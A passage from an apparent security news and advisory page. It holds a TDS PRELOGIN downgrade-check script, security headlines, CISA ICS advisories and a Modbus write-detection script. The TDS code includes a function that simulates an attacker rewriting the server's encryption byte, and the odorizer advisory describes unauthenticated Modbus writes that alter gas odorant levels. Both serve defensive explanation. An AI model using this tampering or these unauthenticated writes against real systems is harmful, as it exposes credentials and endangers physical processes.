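TOKEN_VERSION, TOKEN_ENCRYPTION, TOKEN_TERMINATOR = 0x00, 0x01, 0xFF
ENCRYPT_OFF, ENCRYPT_ON, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0x00, 0x01, 0x02, 0x03


def parse_prelogin(packet: bytes) -> dict:
    """Return {option token: option bytes} for a TDS PRELOGIN packet.

    Layout per MS-TDS: an 8-byte packet header, then a table of 5-byte entries
    (token, offset, length; offsets are relative to the payload start) closed by
    0xFF, then the option data the table points at.
    """
    if len(packet) < 8:
        raise ValueError("short TDS packet")
    ptype, _status, length, _spid, _pkt_id, _window = struct.unpack(">BBHHBB", packet[:8])
    if ptype != PRELOGIN_PACKET_TYPE:
        raise ValueError(f"not a PRELOGIN packet (type 0x{ptype:02x})")
    if length != len(packet):
        raise ValueError("declared length does not match packet size")
    payload, options, pos = packet[8:], {}, 0
    while True:
        if pos >= len(payload):
            raise ValueError("option table has no terminator")
        token = payload[pos]
        if token == TOKEN_TERMINATOR:
            return options
        if pos + 5 > len(payload):
            raise ValueError("truncated option table entry")
        offset, opt_len = struct.unpack(">HH", payload[pos + 1:pos + 5])
        if offset + opt_len > len(payload):
            raise ValueError(f"option 0x{token:02x} points outside the payload")
        options[token] = payload[offset:offset + opt_len]
        pos += 5


def server_encryption(reply: bytes) -> int:
    """The server's ENCRYPTION answer; a missing or malformed option is an error, not 'off'."""
    enc = parse_prelogin(reply).get(TOKEN_ENCRYPTION)
    if enc is None or len(enc) != 1:
        raise ValueError("server PRELOGIN carries no usable ENCRYPTION option")
    return enc[0]


def login_may_proceed(reply: bytes, client_requested: int = ENCRYPT_ON) -> bool:
    """Fail-closed downgrade check applied before the client sends LOGIN7.

    Stricter than the MS-TDS negotiation table on purpose: if we asked for
    encryption, only ENCRYPT_ON or ENCRYPT_REQ from the server is acceptable.
    If we only offered ENCRYPT_OFF (login packet protected, rest in the clear),
    ENCRYPT_NOT_SUP is still refused because it would put the credentials on
    the wire in plaintext, which is exactly what the downgrade aims for.
    """
    enc = server_encryption(reply)
    if client_requested in (ENCRYPT_ON, ENCRYPT_REQ):
        return enc in (ENCRYPT_ON, ENCRYPT_REQ)
    return enc != ENCRYPT_NOT_SUP


def build_prelogin(encryption: int) -> bytes:
    """Build a minimal PRELOGIN packet (VERSION + ENCRYPTION) for the constructed samples."""
    version = b"\x0c\x00\x0f\xa0\x00\x00"        # UL_VERSION + US_SUBBUILD, dummy values
    entries = [(TOKEN_VERSION, version), (TOKEN_ENCRYPTION, bytes([encryption]))]
    offset = 5 * len(entries) + 1                 # option data starts after table + terminator
    table, data = b"", b""
    for token, value in entries:
        table += struct.pack(">BHH", token, offset, len(value))
        data += value
        offset += len(value)
    payload = table + bytes([TOKEN_TERMINATOR]) + data
    header = struct.pack(">BBHHBB", PRELOGIN_PACKET_TYPE, 0x01, 8 + len(payload), 0, 1, 0)
    return header + payload


def rewrite_encryption(packet: bytes, new_value: int) -> bytes:
    """What an on-path attacker does to the server's reply: overwrite the ENCRYPTION byte in place."""
    payload, pos = packet[8:], 0
    while payload[pos] != TOKEN_TERMINATOR:
        token, offset, _ = struct.unpack(">BHH", payload[pos:pos + 5])
        if token == TOKEN_ENCRYPTION:
            return packet[:8 + offset] + bytes([new_value]) + packet[8 + offset + 1:]
        pos += 5
    raise ValueError("no ENCRYPTION option to rewrite")


if __name__ == "__main__":
    honest = build_prelogin(ENCRYPT_ON)
    tampered = rewrite_encryption(honest, ENCRYPT_NOT_SUP)
    print("honest reply   ->", "proceed" if login_may_proceed(honest) else "abort")
    print("tampered reply ->", "proceed" if login_may_proceed(tampered) else "abort")
```

In Microsoft's SQL Server client drivers the same policy is what Encrypt=True enforces, and on the server side the Force Encryption option makes the instance answer ENCRYPT_REQ. Keep TrustServerCertificate=False as well: a downgrade can also take the form of a substituted certificate during the TLS handshake, which no PRELOGIN check detects.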

6-Year Ransomware Campaign Targets Turkish Homes & SMBs

While enterprise breaches make more headlines, smaller incidents tend to be under-reported, if they are reported at all, allowing campaigns to last longer with less disruption.

Critical MCP Integration Flaw Puts NGINX at Risk

Attackers can abuse the near-maximum severity flaw in nginx-ui to restart, create, modify, and delete NGINX configuration files.

Microsoft, Salesforce Patch AI Agent Data Leak Flaws

Two recently fixed prompt injections in Salesforce Agentforce and Microsoft Copilot would have enabled an external attacker to leak sensitive data.

North Korean hackers used AI-enabled social engineering in Zerion attack

It is the second long-term social-engineering attack this month, after the $280 million exploit of the Drift Protocol.

Microsoft adds Windows protections for malicious Remote Desktop files

Microsoft has introduced new Windows protections to defend against phishing attacks that abuse Remote Desktop connection (.rdp) files, adding warnings and disabling risky shared resources by default. [...]

Crypto-exchange Kraken extorted by hackers after insider breach

The Kraken cryptocurrency exchange announced that a cybercrime group is trying to extort the company by threatening to release videos showing internal systems that host client data. [...]

Patch Tuesday, April 2026 Edition

Microsoft today pushed software updates to fix a staggering 167 security vulnerabilities in its Windows operating systems and related software, including a SharePoint Server zero-day and a publicly disclosed weakness in Windows Defender dubbed "BlueHammer." Separately, Google Chrome fixed its fourth zero-day of 2026, and an emergency update for Adobe Reader nixes an actively exploited flaw that can lead to remote code execution.

EDR-Killer Ecosystem Expansion Requires Stronger BYOVD Defenses

Stopping EDR killers, which employ bring-your-own-vulnerable-driver (BYOVD) attack techniques, is difficult, but not impossible.

DAO behind CoW Swap urges users to stay off platform after ‘hijacking’

The decentralized exchange aggregator said users should refrain from visiting its website after a frontend exploit.

Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites

Dozens of WordPress plug-ins were allegedly hijacked to push malware after they were sold to a new corporate owner.

Critical Patches Issued for Microsoft Products, April 14, 2026

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

McGraw-Hill confirms data breach following extortion threat

Education company McGraw-Hill has confirmed in a statement to BleepingComputer that hackers exploited a Salesforce misconfiguration and accessed its internal data. [...]

Multiple Vulnerabilities in Fortinet Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for arbitrary code execution. FortiAnalyzer is a unified security operations platform that consolidates telemetry across networks, endpoints, and cloud environments. FortiClientEMS is a centralized management platform for deploying, configuring, monitoring, and enforcing security policies across numerous endpoints (computers) running the FortiClient agent. FortiDDoS is an inline, purpose-built solution that protects organizations against disruptions caused by attacks that flood a target with packets and exhaust resources, causing the network, applications, or services to be unavailable to legitimate traffic. FortiManager is a centralized management platform that lets you configure, monitor, and control multiple Fortinet security devices from a single interface. FortiNAC-F is a zero-trust network access solution that provides users with enhanced visibility into the Internet of Things (IoT) devices on their enterprise networks. FortiNDR is Fortinet's Network Detection and Response product. FortiOS is Fortinet's proprietary operating system, which is used across multiple product lines. FortiPAM provides privileged access management and control for elevated and privileged accounts, processes, and systems across the entire IT environment. FortiProxy is a secure web gateway product from Fortinet that protects users from internet-borne attacks, enforces compliance, and improves network performance. FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware. FortiSOAR is a security orchestration, automation, and response (SOAR) solution that aims to simplify security operations for organizations. FortiSwitchManager is Fortinet's dedicated, on-premise platform for centrally managing FortiSwitch devices in large deployments.
FortiVoice is a unified communications solution that combines voice, chat, conferencing, and fax into a single, secure platform for businesses and schools. FortiWeb is a web application firewall (WAF) that protects web applications and APIs from cyberattacks like SQL injection and cross-site scripting, while also helping to meet compliance requirements. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those that operate with administrative user rights.

Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe Acrobat Reader is a free, widely used software application from Adobe that allows users to view, print, sign, share, and annotate PDF documents. Adobe InDesign is desktop publishing software used to create, pre-flight, and publish professional page layouts for print and digital media. Adobe InCopy is professional writing and editing software that integrates directly with Adobe InDesign to enable collaborative workflows between editors, copywriters, and designers. Adobe Experience Manager (AEM) Screens is a cloud-based digital signage solution that extends AEM’s content management capabilities to physical, in-venue displays. Adobe FrameMaker is a powerful, industry-standard desktop publishing software designed for authoring, managing, and publishing complex, long-form technical documentation. Adobe Connect is a secure, highly customizable web conferencing and virtual training platform used for webinars, online meetings, and e-learning. Adobe ColdFusion is a commercial rapid web application development platform and server-side technology used to build, deploy, and manage dynamic websites and internet applications. Adobe Bridge is a free, powerful digital asset management (DAM) application designed to organize, browse, locate, and view creative assets. Adobe Photoshop is software for raster image editing, graphic design, and digital art. The Adobe DNG Software Development Kit (SDK) is a set of tools and libraries for developers to read, write, and manipulate Digital Negative (DNG) files, an open, lossless raw image format. Adobe Illustrator is vector graphics software used by designers to create scalable, high-resolution artwork such as logos, icons, illustrations, and typography. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. 
Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Adobe fixes PDF zero-day security bug that hackers have exploited for months

It's not clear how many people were compromised by this hacking campaign, but a security researcher said the hackers were targeting victims since at least November 2025.

Fake Ledger Live app on Apple App Store drained $9.5M from victims: ZachXBT

A Fake Ledger Live app on Apple’s store is tied to $9.5 million in crypto thefts, as ZachXBT links over 50 victims’ funds to a KuCoin-linked mixer and questions Apple’s liability.

5 Ways Zero Trust Maximizes Identity Security

Stolen credentials remain a top breach vector, often leading to unchecked privilege escalation. Specops explains how identity-first Zero Trust limits access, enforces device trust, and blocks lateral movement. [...]

Anthropic’s Claude Mythos Preview: The AI Cybersecurity Inflection Point

AI just crossed a threshold. Anthropic’s Claude Mythos can discover and chain vulnerabilities at scale—faster than teams can remediate. What does this mean for your security program, your providers, and your ability to keep up before attackers do?

CISA Adds Two Known Exploited Vulnerabilities to Catalog

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

CVE-2009-0238 Microsoft Office Remote Code Execution Vulnerability
CVE-2026-32201 Microsoft SharePoint Server Improper Input Validation Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

European Gym giant Basic-Fit data breach affects 1 million members

Dutch fitness giant Basic-Fit announced that hackers breached its systems and gained access to information belonging to a million of its customers. [...]

Why Orgs Need to Test Networks to Withstand DDoS Attacks During Peak Loads

Security teams can't test distributed denial-of-service defenses in a vacuum. They need to test during periods of high demand, such as tax filing deadlines.

CSA: CISOs Should Prepare for Post-Mythos Exploit Storm

In a new report from the Cloud Security Alliance (CSA), experts warn of an "AI vulnerability storm" triggered by the introduction of Anthropic's Claude Mythos.

Adobe Patches Actively Exploited Zero-Day That Lingered for Months

An attacker has been using maliciously crafted PDF files to exploit a zero-day in Adobe Acrobat and Reader for at least four months.

Stolen Rockstar Games analytics data leaked by extortion gang

Rockstar Games has suffered a data breach linked to a recent security incident at Anodot, with the ShinyHunters extortion gang now leaking the stolen data on its data leak site. [...]

Critical flaw in wolfSSL library enables forged certificate use

A critical vulnerability in the wolfSSL SSL/TLS library can weaken security via improper verification of the hash algorithm or its size when checking Elliptic Curve Digital Signature Algorithm (ECDSA) signatures. [...]

OpenAI rotates macOS certs after Axios attack hit code-signing workflow

OpenAI is rotating potentially exposed macOS code-signing certificates after a GitHub Actions workflow executed a malicious Axios package during a recent supply chain attack. [...]

APT41 Delivers 'Zero-Detection' Backdoor to Harvest Cloud Credentials

The prolific China-backed threat group is targeting AWS, Google, Azure, and Alibaba cloud environments and using typosquatting to obscure C2 communication.

CISA Adds Seven Known Exploited Vulnerabilities to Catalog

CISA has added seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

CVE-2012-1854 Microsoft Visual Basic for Applications Insecure Library Loading Vulnerability
CVE-2020-9715 Adobe Acrobat Use-After-Free Vulnerability
CVE-2023-21529 Microsoft Exchange Server Deserialization of Untrusted Data Vulnerability
CVE-2023-36424 Microsoft Windows Out-of-Bounds Read Vulnerability
CVE-2025-60710 Microsoft Windows Link Following Vulnerability
CVE-2026-21643 Fortinet SQL Injection Vulnerability
CVE-2026-34621 Adobe Acrobat and Reader Prototype Pollution Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Messaging push notifications are a privacy attack surface, says Durov

The comments followed recent reports that law enforcement officials retrieved deleted Signal messages through device push notification logs.

Sam Altman responds to ‘incendiary’ New Yorker article after attack on his home

The OpenAI CEO's new blog post responds to both an apparent attack on his home and an in-depth New Yorker profile raising questions about his trustworthiness.

Hims Breach Exposes the Most Sensitive Kinds of PHI

Threat actors breached the telehealth brand, and now they may know who's bald, overweight, and impotent. What could they do with that information?

Your Next Breach Will Look Like Business as Usual

These are the fundamental detection model shifts cybersecurity teams need to make to keep up with the rising number of credential-based attacks.

Price predictions 4/10: BTC, ETH, XRP, BNB, SOL, DOGE, HYPE, ADA, BCH, LINK

Bitcoin bulls spent the week stampeding toward a critical overhead resistance level, which, if breached, could restart the bull market in BTC and altcoins.

Nearly 4,000 US industrial devices exposed to Iranian cyberattacks

The attack surface targeted by Iranian-linked hackers in cyberattacks against U.S. critical infrastructure networks includes thousands of Internet-exposed programmable logic controllers (PLCs) manufactured by Rockwell Automation. [...]

FINRA Launches Financial Intelligence Fusion Center to Combat Cybersecurity and Fraud Threats
Analysis of one billion CISA KEV remediation records exposes limits of human-scale security

Analysis of 1 billion CISA KEV remediation records reveals a breaking point for human-scale security. Qualys shows most critical flaws are exploited before defenders can patch them. [...]

CPUID hacked to deliver malware via CPU-Z, HWMonitor downloads

Hackers gained access to an API for the CPUID project and changed the download links on the official website to serve malicious executables for the popular CPU-Z and HWMonitor tools. [...]

Can Anthropic Keep Its Exploit-Writing AI Out of the Wrong Hands?

Its Mythos Preview model, which can allegedly find and exploit critical zero-days, also comes with certain controls, the vendor said.

Microsoft: Canadian employees targeted in payroll pirate attacks

A financially motivated threat actor tracked as Storm-2755 is stealing Canadian employees' salary payments after hijacking their accounts in payroll pirate attacks. [...]

Florida AG to probe OpenAI, alleging possible connection to FSU shooting

Florida Attorney General James Uthmeier plans to investigate OpenAI for its alleged harm to minors, potential to threaten national security, and its possible link to a shooting at Florida State University last year.

New ‘LucidRook’ malware used in targeted attacks on NGOs, universities

A new Lua-based malware, called LucidRook, is being used in spear-phishing campaigns targeting non-governmental organizations and universities in Taiwan. [...]

New VENOM phishing attacks steal senior executives' Microsoft logins

Threat actors using a previously undocumented phishing-as-a-service (PhaaS) platform called "VENOM" are targeting credentials of C-suite executives across multiple industries. [...]

'BlueHammer' Windows Zero-Day Exploit Signals Microsoft Bug Disclosure Issues

Under the alias 'Chaotic Eclipse,' a researcher released a PoC exploit for a zero-day flaw that allows for system takeover by a local user, citing an undisclosed beef with Microsoft.

Healthcare IT solutions provider ChipSoft hit by ransomware attack

Dutch healthcare software vendor ChipSoft has been impacted by a ransomware attack that forced the company to take offline its website and digital services for patients and healthcare providers. [...]

Inside Cirro: Attack Paths, Cloud Graphs, and Extensible Schemas

Cloud risk doesn’t live in a single permission; it lives in the relationships between them. Discover how Cirro maps hidden attack paths across Azure identities, resources, and data to reveal what attackers actually see.

Google Chrome adds infostealer protection against session cookie theft

Google has rolled out Device Bound Session Credentials (DBSC) protection in Chrome 146 for Windows, designed to block info-stealing malware from harvesting session cookies. [...]

Do Ceasefires Slow Cyberattacks? History Suggests Not

The cybersecurity community is waiting with bated breath to see if Iranian hackers will honor a ceasefire that doesn't actually name or directly involve them.

Smart Slider updates hijacked to push malicious WordPress, Joomla versions

Hackers hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla, and pushed a malicious version with multiple backdoors. [...]

When attackers already have the keys, MFA is just another door to open

Stolen credentials turn authentication systems into the attack surface. Token shows how wearable biometric authentication verifies the user—not the session—blocking phishing relays and MFA bypass. [...]

Webinar: From noise to signal - What threat actors are targeting next

Threat actors often signal their intentions before launching attacks, from dark web chatter to access-broker listings and credential requests. Join our upcoming webinar with Flare Systems to learn how to turn those early warning signs into proactive defensive action before an intrusion begins. [...]

Contemporary Controls BASC 20T

Summary

Successful exploitation of this vulnerability could allow an attacker to enumerate the functionality of each component associated with the PLC, reconfigure, rename, delete, perform file transfers, and make remote procedure calls.

The following versions of Contemporary Controls BASC 20T are affected:
BASControl20 3.1 (CVE-2025-13926)

CVSS v3: 9.8
Vendor: Contemporary Controls Sedona Alliance
Equipment: Contemporary Controls BASC 20T
Vulnerabilities: Reliance on Untrusted Inputs in a Security Decision

Background

Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2025-13926 (Contemporary Controls Sedona Alliance BASControl20 3.1, known_affected)
An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T.
CWE-807 Reliance on Untrusted Inputs in a Security Decision
CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remediations

Mitigation: According to Contemporary Controls, the BASC-20T is an obsolete product. It is recommended that users of the affected product contact Contemporary Controls for additional information: https://www.ccontrols.com/support/contacttech.htm

Acknowledgments

Joseph Fields of Naval Information Warfare Center Pacific reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-04-09
2026-04-09, Revision 1: Initial Publication

GPL Odorizers GPL750

Summary
Successful exploitation of this vulnerability could allow a remote attacker to manipulate register values, which would result in too much or too little odorant being injected into a gas line. The vendor text describes a low-privileged attacker, but the CVSS vector scores PR:N and the weakness is Missing Authentication for Critical Function (CWE-306): the Modbus writes need no credentials, only network reach to the controller.

Affected versions:
GPL750 (XL4) >=v1.0 and <v6.0
GPL750 (XL4 Prime) >=v4.0 and <v6.0
GPL750 (XL7) >=v13.0 and <v20.0
GPL750 (XL7 Prime) >=v18.4 and <v20.0
CVSS v3.1 base score: 8.6 (High), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Vendor: GPL Odorizers
Equipment: GPL Odorizers GPL750
Vulnerability: Missing Authentication for Critical Function (CWE-306)

Background
Critical infrastructure sectors: Critical Manufacturing
Countries/areas deployed: Worldwide
Company headquarters location: United States

Vulnerability
CVE-2026-4436: A remote attacker can send Modbus packets to manipulate register values that are inputs to the odorant injection logic such that too much or too little odorant is injected into a gas line. Note the vector: confidentiality is unaffected (C:N) and the scope changes (S:C), because the impact lands on the physical process rather than on the controller itself.

Affected products
GPL Odorizers GPL750 (XL4): >=v1.0 and <v6.0 (status: known affected)
GPL Odorizers GPL750 (XL4 Prime): >=v4.0 and <v6.0 (status: known affected)
GPL Odorizers GPL750 (XL7): >=v13.0 and <v20.0 (status: known affected)
GPL Odorizers GPL750 (XL7 Prime): >=v18.4 and <v20.0 (status: known affected)

Remediations
Mitigation: GPL Odorizers recommends users update to the latest software version of the GPL750 in connection with the latest firmware from Horner Automation for the XL4, XL4 Prime, XL7, and XL7 Prime devices: https://lincenergysystems-my.sharepoint.com/:f:/p/h_baer/IgDYaHIhXpyLQJvnKPd6b80TAUgV7Lp8qmVYBFUb0lmr7ak?e=JLeADm
Mitigation: GPL Odorizers recommends users clear the old files from their microSD cards, keeping only the LOGS folder and, if they have a WebMI license, the FIRMWARE.LIC file. The compressed folder downloaded from the link above can then be extracted to the root directory of the microSD card. These files already include the corresponding firmware update. If users do not have IT permissions to access their microSD cards, GPL Odorizers can provide preconfigured SD cards that technicians can simply swap into their odorizers prior to installation.
Mitigation: For assistance in updating GPL Odorizers to the latest version, users should reach out to GPL Odorizers directly by phone at (303) 697-6701 between 8:00 a.m. and 4:00 p.m. MST.
Mitigation: Horner Automation offers firmware version 15.76 for its XL Series and version 17.30 for its XL Prime Series controllers, with an installation guide for each series: https://hornerautomation.com/controller-firmware/

Metrics
CVSS v3.1: 8.6 (High), CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Acknowledgments
An anonymous researcher reported this vulnerability to CISA.

Legal notice and terms of use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks: do not click web links or open attachments in unsolicited email messages; refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams; refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision history
Initial release date: 2026-04-09
2026-04-09, revision 1: Initial publication
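Until the update is applied, the only thing standing between an attacker and the odorant setpoints is whether unauthenticated Modbus write requests can reach the controller at all. The script below is an added example, not GPL Odorizers' or Horner Automation's code, of the check a defender can run over captured traffic: it parses Modbus/TCP frames, picks out the state-changing function codes, and raises an alert when a write comes from a host outside an allowlist. The allowlist subnet, register numbers, unit id and the sample frames are constructed for the example; malformed frames are reported rather than dropped, since a frame that is not Modbus on the Modbus port is itself worth a look.

```python
"""Flag unauthenticated Modbus/TCP writes reaching a PLC such as the odorizer
controller above.  Added example, not GPL Odorizers' or Horner Automation's
code: the allowlist, register numbers and sample frames are constructed."""
import struct
from ipaddress import ip_address, ip_network
from typing import Optional

# Modbus function codes that change controller state.
WRITE_FUNCTIONS = {
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
}

# Assumed: only the SCADA/engineering subnet may write to the controller.
WRITE_ALLOWLIST = [ip_network("10.10.1.0/24")]


def parse_modbus_tcp(frame: bytes) -> dict:
    """Parse one Modbus/TCP frame.

    MBAP header: transaction id (2) | protocol id (2, always 0) | length (2) |
    unit id (1); then the PDU: function code (1) | function-specific data.
    Raises ValueError for frames that are not well-formed Modbus/TCP.
    """
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    # length counts the unit id and the PDU, so the frame is 6 + length bytes
    if len(frame) != 6 + length:
        raise ValueError(f"length field {length} does not match {len(frame)}-byte frame")
    pdu = frame[7:]
    func = pdu[0]
    info = {"transaction_id": tid, "unit_id": unit, "function": func}
    if func in (0x05, 0x06) and len(pdu) >= 5:
        # single write: start address (2) + value (2)
        info["address"], info["value"] = struct.unpack(">HH", pdu[1:5])
    elif func == 0x10 and len(pdu) >= 6:
        # multiple register write: address (2) + quantity (2) + byte count (1) + values
        addr, qty, nbytes = struct.unpack(">HHB", pdu[1:6])
        values = ()
        if nbytes == 2 * qty and len(pdu) >= 6 + nbytes:
            values = struct.unpack(f">{qty}H", pdu[6:6 + nbytes])
        info.update(address=addr, quantity=qty, values=list(values))
    elif func in (0x01, 0x02, 0x03, 0x04, 0x0F) and len(pdu) >= 5:
        # reads and multiple-coil write: address (2) + quantity (2)
        info["address"], info["quantity"] = struct.unpack(">HH", pdu[1:5])
    return info


def check_write(src_ip: str, frame: bytes) -> Optional[str]:
    """Return an alert line if the frame is a state-changing request from a host
    outside WRITE_ALLOWLIST, else None.  Raises ValueError on malformed frames."""
    info = parse_modbus_tcp(frame)
    func = info["function"]
    if func not in WRITE_FUNCTIONS:
        return None
    src = ip_address(src_ip)
    if any(src in net for net in WRITE_ALLOWLIST):
        return None
    return (f"ALERT {src_ip} -> unit {info['unit_id']}: {WRITE_FUNCTIONS[func]} "
            f"(0x{func:02x}) at address {info.get('address')} from non-allowlisted host")


def scan(events) -> list:
    """events: iterable of (src_ip, frame).  Returns the list of alert lines."""
    alerts = []
    for src_ip, frame in events:
        try:
            alert = check_write(src_ip, frame)
        except ValueError as exc:
            alert = f"MALFORMED {src_ip}: {exc}"
        if alert:
            alerts.append(alert)
    return alerts


def build_frame(tid: int, unit: int, pdu: bytes) -> bytes:
    """Wrap a PDU in an MBAP header (length = unit id + PDU)."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed sample traffic, not captured from any real device.
SAMPLE_EVENTS = [
    # SCADA host polls holding registers 0..9: a read, never alerted.
    ("10.10.1.5", build_frame(1, 1, bytes([0x03]) + struct.pack(">HH", 0, 10))),
    # SCADA host writes setpoint register 40: allowlisted source.
    ("10.10.1.5", build_frame(2, 1, bytes([0x06]) + struct.pack(">HH", 40, 250))),
    # Unknown host writes the same register: alert.
    ("203.0.113.77", build_frame(3, 1, bytes([0x06]) + struct.pack(">HH", 40, 9999))),
    # Unknown host zeroes two registers in one request: alert.
    ("203.0.113.77", build_frame(4, 1, bytes([0x10]) + struct.pack(">HHB", 40, 2, 4)
                                  + struct.pack(">HH", 0, 0))),
    # Protocol id 7 is not Modbus: reported as malformed.
    ("203.0.113.77", struct.pack(">HHHB", 5, 7, 2, 1) + bytes([0x03])),
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

The allowlist is the control, not the detection: the same logic can feed a firewall rule that permits function codes 0x05/0x06/0x0F/0x10 only from the SCADA subnet, which is what "minimize network exposure" means in practice for a controller that accepts writes without authentication.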

Eurail says December data breach impacts 300,000 individuals

Eurail B.V., a European travel operator that provides digital passes covering 33 national railways, says attackers stole the personal information of over 300,000 individuals in a December 2025 data breach. [...]

Russia's Forest Blizzard Nabs Rafts of Logins via SOHO Routers

Heard of fileless malware? How about malwareless cyber espionage? Russia's APT28 is spying on global organizations by modifying just one DNS setting in vulnerable routers.

Threat Actors Get Crafty With Emojis to Escape Detection

When 🤖 means "bot available," 🧰 signifies "toolkit," or 💰💰💰 translates to "big ransom," bad actors can evade filters and keep it all on the down-low.

AI-Led Remediation Crisis Prompts HackerOne to Pause Bug Bounties

